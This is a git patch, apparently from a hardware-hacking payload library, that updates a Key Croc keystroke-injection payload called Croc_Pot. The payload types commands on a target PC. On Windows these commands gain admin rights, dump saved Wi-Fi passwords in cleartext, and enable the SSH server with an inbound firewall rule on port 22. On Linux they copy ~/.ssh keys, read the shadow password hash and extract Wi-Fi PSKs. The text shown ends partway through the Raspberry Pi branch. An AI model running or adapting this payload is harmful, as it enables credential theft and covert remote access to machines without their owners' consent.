From 7cf96f46150a7ee4d495429bdb8d987f37fef136 Mon Sep 17 00:00:00 2001 From: spywill Date: Wed, 23 Nov 2022 03:43:40 -0500 Subject: [PATCH] Update Croc_Pot_Payload.txt minor changes Check numlock state on or off Check with nmap SSH status of target pc Windows start powershell with administrator privileges --- .../general/Croc_Pot/Croc_Pot_Payload.txt | 595 +++++++++--------- 1 file changed, 281 insertions(+), 314 deletions(-) diff --git a/payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt b/payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt index 5f7ef57..5f16a03 100644 --- a/payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt +++ b/payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt @@ -3,7 +3,7 @@ # This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address) # save to tools/Croc_pot folder # Author: Spywill -# Version: 1.3.9 +# Version: 1.4.1 # Category: Key Croc MATCH crocpot @@ -21,7 +21,7 @@ fi #---> Save keycroc passwd in temp folder #---> This is used for starting Reverse SSH Tunnel with Target PC -echo "${CROC_PW}" >> /tmp/CPW.txt +echo "${CROC_PW}" > /tmp/CPW.txt #---> Create Croc_Pot folders if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then @@ -33,6 +33,8 @@ fi #---> Payload variable/remove existing OS detection CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt +rm /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt +rm /root/udisk/tools/Croc_Pot/NumLock.txt #---> Enter ethernet mode for OS detection ATTACKMODE AUTO_ETHERNET @@ -52,373 +54,338 @@ WINDOWS) ATTACKMODE HID STORAGE sleep 1 #---> Start windows powershell - Q GUI r - sleep 1 + Q GUI r ; sleep 1 Q STRING "powershell" - Q ENTER - sleep 5 + Q ENTER ; sleep 5 + #---> Start windows powershell with administrator privileges + Q STRING "start-process powershell -verb runas ; exit" + Q ENTER ; sleep 3 + Q LEFTARROW ; sleep 1 + Q ENTER ; sleep 3 + #---> Check numlock state on or off + Q STRING "\$wsh = New-Object -ComObject WScript.Shell ; if ([console]::NumberLock -eq \$false) { \$wsh.SendKeys('{NUMLOCK}') ; echo \"NUMLOCK TRUN ON\" } else { echo \"NUMLOCK ON\" }" + Q ENTER ; sleep 2 #---> Place keycroc usb drive into variable Q STRING "\$Croc = (gwmi win32_volume -f 'label=\"KeyCroc\"' | Select-Object -ExpandProperty DriveLetter)" - Q ENTER - sleep 1 + Q ENTER ; sleep 2 + #---> Save numlock state to tools/Croc_Pot/Numlock.txt + Q STRING "[console]::NumberLock | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\NumLock.txt\" -noclobber -append" + Q ENTER ; sleep 2 #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt Q STRING "\$env:UserName | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" - Q ENTER - sleep 1 + Q ENTER ; sleep 2 #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt Q STRING "Get-CimInstance -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=\$true | Select-Object -ExpandProperty IPAddress | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" - Q ENTER - sleep 1 + Q ENTER ; sleep 2 #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt Q STRING "(netsh wlan show networks) | Select-String \"\:(.+)\$\" | % {\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)\$\" | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }} | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt Q STRING "wmic nic where PhysicalAdapter=True get MACAddress,Name | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\Croc_OS_Target.txt\" -noclobber -append" - Q ENTER - sleep 3 + Q ENTER ; sleep 3 #---> Ping network to look for Shark Jack Q STRING "ping -n 1 shark.lan | select-string -pattern 'Reply'" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt Q STRING "[System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append" - Q ENTER - sleep 3 + Q ENTER ; sleep 3 #---> Place Shark Jack IP into variable Q STRING "\$jack_mac = [System.Net.Dns]::GetHostAddresses(\"shark.lan\")[0].IPAddressToString" - Q ENTER + Q ENTER ; sleep 2 #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt Q STRING "arp -a \$jack_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\shark_ip.txt\" -noclobber -append" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt Q STRING "arp -a 172.16.32.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\squirrel_mac.txt\"" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Ping network to look for Lan turtle Q STRING "ping -n 1 turtle.lan | select-string -pattern 'Reply'" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt Q STRING "[System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString | Format-Table -AutoSize | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\"" - Q ENTER - sleep 3 + Q ENTER ; sleep 3 #---> Place Lan turtle IP into variable Q STRING "\$turtle_mac = [System.Net.Dns]::GetHostAddresses(\"turtle.lan\")[0].IPAddressToString" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt Q STRING "arp -a \$turtle_mac | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\turtle_mac.txt\" -noclobber -append" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt Q STRING "arp -a 172.16.64.1 | Select-String '([0-9a-f]{2}-){5}[0-9a-f]{2}' | Select-Object -Expand Matches | Select-Object -Expand Value | out-file -encoding UTF8 \"\$Croc\tools\Croc_Pot\bunny_mac.txt\"" - Q ENTER - sleep 2 + Q ENTER ; sleep 2 #---> sed to remove powershell output "\r" endlines - $(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt) + $(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt) #---> sed to return only readable character - $(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt) + $(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt) #---> sed to remove powershell output first "?" character - $(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt) + $(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/NumLock.txt) #---> sed to replace "-" with ":" $(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt) #---> Return back to ATTACKMODE HID mode ATTACKMODE HID - sleep 1 ;; + sleep 1 + #----> Check with nmap SSH status of target pc + #----> Make sure that Windows Defender Firewall allows inbound connections to Windows through TCP port 22: + case $(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered') in + open) + Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled" + Q ENTER ;; + closed) + Q STRING "Service sshd is Closed trying to Enable SSH Server" ; Q ENTER ; sleep 2 + Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd" + Q ENTER ; sleep 2 + Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22" + Q ENTER ; sleep 2 + Q STRING "restart-service sshd" + Q ENTER ; sleep 2 + Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled" + Q ENTER ;; + filtered) + Q STRING "Service sshd is filtered trying to Enable SSH Server" ; Q ENTER ; sleep 2 + Q STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd" + Q ENTER ; sleep 2 + Q STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22" + Q ENTER ; sleep 2 + Q STRING "restart-service sshd" + Q ENTER ; sleep 2 + Q STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled" + Q ENTER ;; + *) + Q STRING "Service sshd unknow" ; Q ENTER ; sleep 1 ;; + esac + sleep 6 ; Q ENTER ; sleep 2 ;; MACOS) #---> Return back to ATTACKMODE HID mode ATTACKMODE HID - LED G - sleep 1 + LED G ; sleep 1 #---> Start mac os terminal - Q GUI-SPACE - sleep 1 + Q GUI-SPACE ; sleep 1 Q STRING "terminal" - Q ENTER - sleep 1 ;; + Q ENTER ; sleep 1 ;; LINUX) #---> Enter Storage mode on keycroc ATTACKMODE HID STORAGE - LED B - sleep 3 + LED B ; sleep 3 #---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value case $TARGET_HOSTNAME in -raspberrypi) - #---> Start Raspberry pi 4 LXTerminal - Q CONTROL-ALT-d - Q CONTROL-ALT-t - sleep 2 - #---> Place keycroc usb drive into variable - Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" - Q ENTER - sleep 1 - Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot" - Q ENTER - sleep 1 - #---> Check numlock state on or off - Q STRING "xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/NumLock.txt" - Q ENTER - sleep 1 - if [ "$(sed -n 1p /root/udisk/tools/Croc_Pot/NumLock.txt)" = off ]; then - Q NUMLOCK - fi - #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "whoami | tee \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" - Q ENTER - sleep 1 - #---> Check SSH status is running - if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then - Q STRING "sudo systemctl start ssh" - Q ENTER - else - Q STRING "SSH is running" - Q ENTER - fi - sleep 1 - #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" - Q ENTER - sleep 2 - #---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt - Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" - Q ENTER - sleep 2 - #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt - Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" - Q ENTER - sleep 2 - #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt - Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt - Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt - Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt - Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH - Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/" - Q ENTER - sleep 2 - #---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt - Q STRING "sudo getent shadow \$(whoami) | tee \${PC_LOOT}/target_hash_passwd" - Q ENTER - sleep 2 - #---> Return back to ATTACKMODE HID mode - ATTACKMODE HID - sleep 1 ;; -${TARGET_HOSTNAME}) - #---> Start mate-terminal -->Parrot OS<-- - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - #---> Check numlock state on or off - Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER - Q ENTER - sleep 3 - #---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable - Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/" - Q ENTER - sleep 2 - #---> Entering Linux passwd - Q STRING "${PC_PW}" - Q ENTER - sleep 1 - #---> Place keycroc usb drive into variable - Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" - Q ENTER - sleep 1 - Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot" - Q ENTER - sleep 1 - #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "whoami | sudo tee \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "hostname -I | awk '{print \$1}' | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}" - Q ENTER - sleep 1 - #---> Check SSH status is running - if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then - Q STRING "sudo systemctl start ssh" - Q ENTER - else - Q STRING "SSH is running" - Q ENTER - fi - sleep 1 - #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt - Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" - Q ENTER - sleep 5 - #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt - Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" - Q ENTER - sleep 2 - #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt - Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt - Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt - Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt - Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH - Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/" - Q ENTER - sleep 2 - #---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt - Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd" - Q ENTER - sleep 2 - #---> Unmount keycroc usb drive - Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" - Q ENTER - sleep 1 - #---> Return back to ATTACKMODE HID mode - ATTACKMODE HID - #---> Remove keycroc directory off target pc - Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" - Q ENTER - sleep 1 ;; -*) - #---> Start linux distributions terminal xterm - #---> Unsure of which linux distribution this will work on - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - #---> Check numlock state on or off - Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER - Q ENTER - sleep 3 - #---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable - Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/" - Q ENTER - sleep 1 - #---> Entering Linux passwd - Q STRING "${PC_PW}" - Q ENTER - sleep 1 - #---> Place keycroc usb drive into variable - Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" - Q ENTER - sleep 1 - #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "whoami | sudo tee \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "hostname -I | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}" - Q ENTER - sleep 1 - #---> Check SSH status is running - if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then - Q STRING "sudo systemctl start ssh" - Q ENTER - else - Q STRING "SSH is running" - Q ENTER - fi - sleep 1 - #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt - Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}" - Q ENTER - sleep 1 - #---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt - Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" - Q ENTER - sleep 5 - #---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt - Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt" - Q ENTER - sleep 2 - #---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt - Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt - Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt - Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt - Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt" - Q ENTER - sleep 2 - #---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH - Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/" - Q ENTER - sleep 2 - #---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt - Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd" - Q ENTER - sleep 2 - #---> Unmount keycroc usb drive - Q STRING "sudo umount /media/\$(whoami)/KeyCroc/" - Q ENTER - sleep 1 - #---> Return back to ATTACKMODE HID mode - ATTACKMODE HID - #---> Remove keycroc directory off target pc - Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" - Q ENTER - sleep 1 ;; + raspberrypi) + #---> Start Raspberry pi 4 LXTerminal + Q CONTROL-ALT-d + Q CONTROL-ALT-t + sleep 2 + #---> Place keycroc usb drive into variable + Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" + Q ENTER ; sleep 1 + Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot" + Q ENTER ; sleep 1 + #---> Check numlock state on or off + Q STRING "xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*' | tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/NumLock.txt" + Q ENTER ; sleep 1 + if [ "$(sed -n 1p /root/udisk/tools/Croc_Pot/NumLock.txt)" = off ]; then + Q NUMLOCK + fi + #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "whoami | tee \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "ip -4 -o addr show wlan0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | tee -a \${PC_USER} && echo '' >> \${PC_USER}" + Q ENTER ; sleep 1 + #---> Check with nmap SSH status of target pc + if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then + Q STRING "sudo systemctl start ssh" + Q ENTER + else + Q STRING "SSH is running" + Q ENTER + fi + sleep 1 + #---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "sed -n '/ssid\|psk/,+1p' /etc/wpa_supplicant/wpa_supplicant.conf | sed -e 's/[\"]//g' | tee -a \${PC_USER}" + Q ENTER ; sleep 1 + #---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt + Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | tee -a \${PC_USER}" + Q ENTER ; sleep 2 + #---> Retrieve Shark Jack IP if connected to local network as target PC 